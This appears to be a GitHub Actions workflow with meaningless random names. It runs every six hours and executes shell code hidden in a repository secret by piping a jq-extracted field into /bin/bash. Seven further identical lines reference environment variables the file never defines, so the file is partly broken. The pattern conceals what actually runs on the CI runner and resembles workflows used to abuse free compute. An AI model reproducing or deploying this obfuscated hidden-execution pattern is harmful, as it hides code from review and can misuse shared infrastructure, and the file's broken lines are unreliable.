name: yanxiaorou4187

on:
  workflow_dispatch:
  schedule:
    - cron: '42 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yanxiaorou4187
        env:
          vdc302: ${{ secrets.vdc302 }}
        run: |
          echo $vdc302 | jq -r .rrd5 | /bin/bash
          echo $wf2565 | jq -r .r5 | /bin/bash
          echo $v559 | jq -r .up733 | /bin/bash
          echo $qwbv581 | jq -r .jmqwe34 | /bin/bash
          echo $rp6 | jq -r .xq88 | /bin/bash
          echo $ezocp5 | jq -r .m187 | /bin/bash
          echo $whe750 | jq -r .xvup391 | /bin/bash
          echo $wr537 | jq -r .zg194 | /bin/bash

